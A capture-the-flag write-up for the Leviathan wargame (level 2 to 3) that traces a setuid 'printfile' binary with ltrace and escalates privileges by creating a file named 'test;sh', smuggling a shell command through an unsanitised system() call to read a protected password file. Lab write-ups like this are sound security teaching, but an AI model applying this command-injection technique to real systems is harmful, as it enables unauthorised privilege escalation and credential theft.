Leviathan Level 2 → Level 3

The printfile will print a file content on screen. However, trying to show the leviathan3 password result in permission issue.

./printfile /etc/leviathan_pass/leviathan3
You cant have that file...

Let do a ltrace again with the password and see what happened.

ltrace ./printfile /etc/leviathan_pass/leviathan3
__libc_start_main(0x80484f4, 2, -10332, 0x80485d0, 0x8048640 <unfinished ...>
access("/etc/leviathan_pass/leviathan3", 4) = -1
puts("You cant have that file..."You cant have that file...
) = 27
+++ exited (status 1) +++

Let see what happen if we use printfile correctly.

ltrace ./printfile /tmp/l2/test
__libc_start_main(0x80484f4, 2, -10316, 0x80485d0, 0x8048640 <unfinished ...>
access("/tmp/l2/test", 4) = 0
snprintf("/bin/cat /tmp/l2/test", 511, "/bin/cat %s", "/tmp/l2/test") = 21
system("/bin/cat /tmp/l2/test"
 <unfinished ...>
--- SIGCHLD (Child exited) ---
<... system resumed> ) = 0
+++ exited (status 0) +++

Notice it will check the access level and then print the file using /bin/cat on the filename. The problem with this is that there is no input sanitizing and we can attach a filename that do additional commands.  First thing comes to mind is to append a command to read the password file but “/” is not allow in a file name. So we could use “;” to add a second command that spawn a shell.

touch "/tmp/l2/test;sh"
./prinfile "/tmp/l2/test;sh"

We simply read the content of the password file for the next level after we spawn a shell using elevated permission.


cat /etc/leviathan_pass/leviathan3